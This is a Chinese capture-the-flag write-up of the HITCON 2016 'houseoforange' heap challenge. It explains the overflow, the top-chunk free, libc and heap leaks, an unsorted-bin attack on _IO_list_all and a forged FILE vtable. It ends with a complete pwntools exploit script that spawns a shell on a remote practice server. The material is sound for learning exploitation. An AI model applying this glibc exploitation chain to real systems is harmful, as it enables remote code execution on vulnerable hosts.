houseoforange_hitcon_2016：

很经典的一道题目，checsec一下，保护全开

程序分析：

这题最主要就是没有free

漏洞分析：

edit里的length和add里的length没有联系，
我们可以造成堆溢出

大致思路：

1.释放到unsortbin中，泄露libc_base和heap_addr:
利用堆溢出，改Top_chunk_size为一个较小的值，我们再申请一个大于Top_chunk_size的chunk的话，系统会用sysmalloc来分配堆，如果符合sysmalloc条件的话，原来的top chunk就会释放到unsorted bin中，
我们就能泄露main_arena和libc_base了，同时为了泄露heap_addr，要申请一个large bin，它的fd_nextsize和bk_nextsize中指向自身
（注意泄露的时候的字符处理）
泄露出来后计算出：
system,_IO_list_all,heap_base

使用条件有：
①可以修改topchunk的size
②伪造的 size 必须要对齐到内存页
③size 要大于 MINSIZE(0x10)
④size 要小于之后申请的 chunk size + MINSIZE(0x10)
⑤size 的 prev inuse 位必须为 1
其中第二点要特别注意，这导致了我们修改topchunk的size的时候要注意4k对齐
例：在覆盖之前 top chunk 的 size 大小是 20fe1，地址是 0x602020，通过计算得知
0x602020+0x20fe0=0x623000 是对于 0x1000（4kb）对齐的

所以我们伪造的size加上地址也要4k对齐，一般是0x0fe1、0x1fe1、0x2fe1、0x3fe1、0xfe1
———————————————— 版权声明：本文为CSDN博主「Carol7S」的原创文章，遵循CC 4.0
BY-SA版权协议，转载请附上原文出处链接及本声明。
原文链接：https://blog.csdn.net/carol2358/article/details/108367870

2.利用unsortbin_attack,改IO_list_all指向unsorted bin的头chunk地址：
我们把IO_list_all-0x10填入unsortbin的bk
会造成IO_list_all指向main_arena中存的unsorted_bin_addr，是 main_arena + 0x58的地址，我们现在把它看作IO_file_plus结构体，它偏移0x68处是_chain的位置，即main_arena + 0x58+0x68=main_arena+0xc0处，而以malloc_state结构来看，存的是small bin的头地址
我们把unsorted bin的头结点的size改成0x60，（偏移0x60，偏移0x68存的值都是unsortbin的地址，所以size0x60，和0x68都行，不知道是不是这原因）这样当我们调用malloc，glibc会整理unsorted bin，把对应size的chunk放入对应的bin里面。（后面会检查，还会利用那个报错）此时，size为0x60，属于small_bin，这样就指向我们控制的堆里了

3.在unsortbin中伪造IO_file_plus和vtable结构：
fake_file这么填：
摘自__lifanxin师傅

# 设 chunk_addr
{file = {_flags = "/bin/sh\x00", # binsh 字符串     chunk_addr + 0x0_IO_read_ptr = 0x0,_IO_read_end = 0x0,_IO_read_base = 0x0,_IO_write_base = 0x0,   #                  chunk_addr + 0x20_IO_write_ptr = 0x1,    # 保证 ptr > base  chunk_addr + 0x28......},                        # vtable_addr = chunk_addr + 0xd8vtable = heap_addr        # 堆上另一个可控地址 heap_addr = chunk_addr + 0xe0
}heap_addr {__dummy = 0x0,__dummy2 = 0x0,__finish = 0x0,__overflow = system,      # _IO_OVERFLOW 覆盖为 system 的地址，其第一个参数就是chunk_addr ...                     # 因此这样构造我们就实现了 system("/bin/sh\x00")...
}

4.最后再malloc：
由于unsorted bin里的指针被修改了,发生malloc_printerr报错，而malloc_printerr用到了__IO_list_all指针，会从__IO_list_all指向的地方开始查找合适的FILE结构。调用里面vtable里的函数，我们在vtable里放入了system函数；以_flag的地址为参数，我们填入了/bin/sh

exp：

from pwn import *
#from LibcSearcher import *
local_file  = './houseoforange_hitcon_2016'
local_libc  = './libc-2.23.so'
remote_libc = './libc-2.23.so'
#remote_libc = '/home/glibc-all-in-one/libs/buu/libc-2.23.so'
select = 1
if select == 0:r = process(local_file)libc = ELF(local_libc)
else:r = remote('node4.buuoj.cn',29247 )libc = ELF(remote_libc)
elf = ELF(local_file)
context.log_level = 'debug'
context.arch = elf.arch
se      = lambda data               :r.send(data)
sa      = lambda delim,data         :r.sendafter(delim, data)
sl      = lambda data               :r.sendline(data)
sla     = lambda delim,data         :r.sendlineafter(delim, data)
sea     = lambda delim,data         :r.sendafter(delim, data)
rc      = lambda numb=4096          :r.recv(numb)
rl      = lambda                    :r.recvline()
ru      = lambda delims                         :r.recvuntil(delims)
uu32    = lambda data               :u32(data.ljust(4, '\0'))
uu64    = lambda data               :u64(data.ljust(8, '\0'))
info    = lambda tag, addr        :r.info(tag + ': {:#x}'.format(addr))
o_g_32_old = [0x3ac3c, 0x3ac3e, 0x3ac42, 0x3ac49, 0x5faa5, 0x5faa6]
o_g_32 = [0x3ac6c, 0x3ac6e, 0x3ac72, 0x3ac79, 0x5fbd5, 0x5fbd6]
o_g_old = [0x45216,0x4526a,0xf02a4,0xf1147]
o_g = [0x45226, 0x4527a, 0xf0364, 0xf1207]
def debug(cmd=''):gdb.attach(r,cmd)
#-----------------------------------
def add(length,name,price):sla('Your choice : ','1')sla('Length of name :',str(length))sa('Name :',name)sla('Price of Orange:',str(price))sla('Color of Orange:','1')
def show():sla('Your choice : ','2')
def edit(length,name,price):sla('Your choice : ','3')sla('Length of name :',str(length))sa('Name:',name)sla('Price of Orange: ',str(price))sla('Color of Orange: ','1')#------------free_to_unsortbin----
add(0x20,'aaaa',0x10)
edit(0x50,'a'*0x20+p64(0)+p64(0x21)+p32(0x10)+p32(0x1f)+p64(0)*2+p64(0xf91),0x10)
add(0x1000,'bbbb',0x10)
#----------leak_libc_base---------
add(0x400,'a',0x10)
show()
main_area_xx=uu64(ru('\x7f')[-6:])
IO_list_all=(main_area_xx & 0xfffffffffffff000)+(libc.sym['_IO_list_all'] & 0xfff)
print 'IO_list='+str(hex(IO_list_all))
libc_base=IO_list_all-libc.sym['_IO_list_all']
system=libc_base+libc.sym['system']
print 'libc_base='+str(hex(libc_base))
#--------leak heap_addr-----------
edit(0x10,'c'*0x10,0x10)
show()
ru('c'*0x10)
heap_base=uu64(ru('\n')[:-1])-0xd0
print hex(heap_base)
#debug()
#---------------------------------
payload='a'*0x400+p64(0)+p64(0x21)+'a'*0x10
fake_file='/bin/sh\x00'+p64(0x68)
fake_file+=p64(0)+p64(IO_list_all-0x10)
fake_file+=p64(0) + p64(1)
fake_file=fake_file.ljust(0xc0,'\x00')
fake_file+=p64(0)*3
fake_file+=p64(heap_base + 0x5d8)
#----------------------
fake_file+=p64(0)*2
fake_file+=p64(system)
payload+=fake_file
edit(len(payload),payload,0x10)
#debug()
sla('Your choice : ','1')
#debug()
r.interactive()

其他：

水平有限，第二步还是有点不懂,如有错误还望见谅
参考师傅：
https://blog.csdn.net/seaaseesa/article/details/104314949
https://blog.csdn.net/A951860555/article/details/116425824
https://blog.csdn.net/carol2358/article/details/108367870